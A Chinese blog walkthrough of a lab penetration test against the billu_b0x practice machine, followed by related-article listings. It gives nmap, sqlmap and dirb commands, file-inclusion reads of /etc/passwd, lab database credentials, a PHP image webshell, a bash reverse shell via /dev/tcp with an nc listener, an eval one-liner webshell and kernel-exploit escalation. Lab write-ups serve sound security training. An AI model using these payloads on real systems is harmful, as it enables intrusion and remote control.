靶场渗透(一)

最新推荐文章于 2025-04-03 02:07:07 发布
最新推荐文章于 2025-04-03 02:07:07 发布
阅读量1.7k 收藏 13
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25645753/article/details/108720691
版权

测试环境

靶机:billu_b0x
攻击机:kali

信息收集

• 获取靶机ip
kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改)
获取到的信息:ip192.168.111.128
在这里插入图片描述
• 扫描开启的端口
kali: nmap -p1-65535 -A 192.168.111.128
获取到的信息:开放端口22,80
在这里插入图片描述
渗透测试

• 根据上面信息搜集得到的80端口开放可以直接访问网站
在这里插入图片描述
• 根据提升尝试进行sql注入攻击
测试语句:1’ or 1=1 #
1’ and 1=1 #
sqlmap: sqlmap -u “http://192.168.111.128” --data “un=admin&ps=admin&login=let%27s+login” –
level 3 --dbms mysql
测试结果都是try again 目前不知道过滤规则暂时放弃fuzz注入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
• 爆破目录
kali: dirb http://192.168.111.128
windows: 御剑扫描
爆破出来11个php页面,一个目录
在这里插入图片描述
在这里插入图片描述
• 逐个访问这些网页
在in.php页面发现这是一个phpinfo并且allow_url_fopen=on考虑是否能进行文件包含(图4.1)
add.php页面是一个上传页面,上传了图片但是没有回显暂时放弃
c.php和show.php都是空白的,想到会不会是菜刀码尝试连接但是失败了
test.php就比较厉害了,它提示我们给他一个file参数(图4.2)
在这里插入图片描述
在这里插入图片描述

• 给test.php页面一个file参数
首先是GET方式:http://192.168.111.128/test.php?file=/etc/passwd POST方式:bp抓包右键更改传参方式(图5.2)结果如图(图5.3)
按照这种方式逐个获取add.php c.php index.php show.php panel.php /etc/passwd
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
• 审计刚才得到的代码
在c.php文件中获取到数据库的用户名密码和数据库名

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
 
ini_set( 'session.cookie_httponly', 1 );
 
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
 
// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }
 
?>

获取shell

• 思路一
◇ 包含phpmyadmin配置文件,默认路径是/var/www/phpmy/config.inc.php,获取到root密码直接ssh连
接即可
在这里插入图片描述

• 思路二
◇ 根据c.php得到的phpmyadmin登陆密码登陆,在ica_lab库的auth表中获取到网站登陆用户名密码
在这里插入图片描述
在这里插入图片描述

◇ 审计panel.php发现他有文件包含漏洞
可利用代码:

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}	
}

◇ 制作图片码并上传,用十六进制编辑器打开一个图片在末尾加上<?php system($_GET['cmd']); ?>,通
过网站adduser功能上传
在这里插入图片描述
在这里插入图片描述

◇ 利用panel.php执行cmd命令
使用burp执行命令: post请求url中加入执行命令的参数: POST /panel.php?cmd=cat%20/etc/
passwd;ls
◇ bash反弹shell命令:echo “bash -i >& /dev/tcp/攻击机ip/4444 0>&1” | bash(需要url编码)
攻击机:nc -lvvp 4444
在这里插入图片描述
在这里插入图片描述
◇ 找一个有写权限的目录上传一个一句话木马
echo ‘<?php eval($_POST['1']); ?>’ >> 1.php
中国蚁剑连接
在这里插入图片描述
◇ 查看系统内核版本,下载对应exp进行本地提权
查看内核版本命令:uanme -a和cat /etc/issue
根据版本查找对应exp下载上传编译运行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结

本次渗透的思路总共有两个:

  1. 通过爆破出来的phpmyadmin页面,利用test.php页面包含获取各个页面的源码拿到密码登陆phpmyadmin找到网站登陆密码,获取shell
  2. 通过文件包含查看phpmyadmin配置文件获取root密码,这种方式的前提是网站管理员没有移动配置文件位置,否则无法实现。

从中获得的启发:
渗透的途径不止一个,不能局限于常规的条条框框,要熟悉各个漏洞能熟练利用.

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

常见渗透测试靶场学习笔记
weixin_34220834的博客
04-24 2752
1.DVWA   作为新手,通常第个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。   1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(CommandInjection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(I...
网络安全实战之靶场渗透技术
kali_Ma的博客
10-20 8715
靶机主要是从信息收集开始,发现是flask搭建的,然后使用flask unsign进行解密,暴力破解。接着使用枚举出的用户进行FTP登录,FTP登录之后,下载pdf文件,发现管理员账号和密码规则,然后登录FTP管理员,接着下载压缩包,进行文件分析,发现可以使用CVE-2021-23639历史漏洞可以获取权限,在文件中发现存在mysql服务,接着进行权限提升,获取到了root文件。
新手必刷的10个渗透靶场(非常详细),零基础入门到精通,看这篇就够了
2302_76672693的博客
10-18 1679
新手必刷的10个渗透靶场(非常详细),零基础入门到精通,看这篇就够了
CFS三层内网靶机渗透
最新发布
qq_41701460的博客
04-03 1027
三层内网靶场,共有三个网段,分别为75网段(公网网段)、22网段(内网)、33网段(内网)靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet4和NAT网卡、Target2搭载VMnet9和VMnet10网卡、Target3仅搭载VMnet10网卡。通过搭建三层内网靶场,来模拟生产环境中外网服务器、内网服务器以及内网办公环境间的关系。
靶场设计和渗透
qq_55213436的博客
04-17 1544
为了深入贯彻学习网络安全法律法规,深入学习渗透测试知识,强化实战技能............编不出来了,反正今天的主题就是设计靶场然后渗透遍。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2493
渗透测试的个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
DC靶场系列-DC9靶场-渗透测试靶场
03-06
DC靶场系列中的DC9靶场个专门为渗透测试练习而设计的模拟环境。它允许测试者在没有法律风险的环境下进行各种网络攻击手段的实践,如SQL注入、XSS攻击、目录遍历等,从而提高自身的技术水平和安全意识。 DC9靶场...
【网络安全】内网渗透次简单内网靶场渗透
anquan2233的博客
07-15 1069
5. 测试使用MS14-068漏洞:使用这个 exp 需要个普通域控用户, web 是域用户,但不知道密码。4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。4.前面对网站进行目录扫描,未发现网站管理后台,因此使用脚本来绑定 hosts 碰撞管理后台的子域名。7.进入网站后台,修改允许上传的类型,上传句话木马。
某CTF线上初赛综合靶场渗透应急write up
weixin_42050681的博客
08-12 1684
某CTF比赛线上初赛渗透与应急完整write up。 本次比赛使用的环境是内网综合靶场环境,与以往CTF赛事内涉及的纯web不同,本次比赛考察点在于模拟真实环境进行的内网渗透和应急响应。赛制还是挺有意思的。
DC靶场系列-DC1靶场-渗透测试靶场
03-09
而DC靶场系列是模拟真实环境提供渗透测试练习的平台,其中DC1靶场则是该系列的第个练习环境。DC1靶场通常包含系列的关卡,每个关卡都设计有不同的安全挑战,供渗透测试人员练习和提升技能。 DC1靶场通关详细...
渗透学习-靶场篇-WebGoat靶场(JWT攻击)
qq_43696276的博客
12-11 2972
本次主要学习了javaweb项目方面任意出现的些安全问题,最主要的是有关于JWT身份认证上的攻击,并利用webgoat靶场进行了些实验。JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验证token,通过token验证用户身份。基于token的身份验证可以替代传统的cookie+session身份验证方法。jwt由三个部分组成:header.payload.signature。
靶场渗透(二)——Acid渗透
Ramona的博客
08-02 981
测试环境 靶机:Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 3049
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 720
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
靶场渗透)——billu_b0x渗透
Ramona的博客
07-29 1221
测试环境 靶机:billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
靶机渗透测试(Quaoar)
@小张小张的博客
09-10 2754
靶机渗透测试(Quaoar): Vulnhub靶机 Quaoar 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(初级) 目标:成功渗透进入靶机,找到三项flag,并拿到root权限。 渗透流程: 1.探测主机ip(此靶机开机时已经给出) 2.nmap进行靶机端口服务扫描 3.根据端口服务进行渗透 22-ssh端口:(msf攻击) 可以通过kali虚拟机msf工具进行ssh_login,但由于密码本的数据容量过小,无法爆破出登陆用户与密码;
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 667
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
漏洞靶机渗透
qq_51690722的博客
11-06 2863
今天我们来讲解如何进行漏洞的靶机渗透 1.首选我们得下下Metasploitable这个文件,去官网找就行 2.下完了之后我们是这个文件夹 3.直接打开Metasploitable虚拟机文件,并打开kali虚拟机 4.然后进到这个界面 5.首先我们进入Metasploitable需要输入账号密码,账号密码都是msfadmin 6.然后我们要ping出靶机的ip地址,需要使用的命令是:ifconfig 现在我们可以看到ip地址是192.168.52.131 7.pin...
靶机渗透测试(covfefe)
小小猪的博客
06-05 1005
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址 arp-scan -l .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值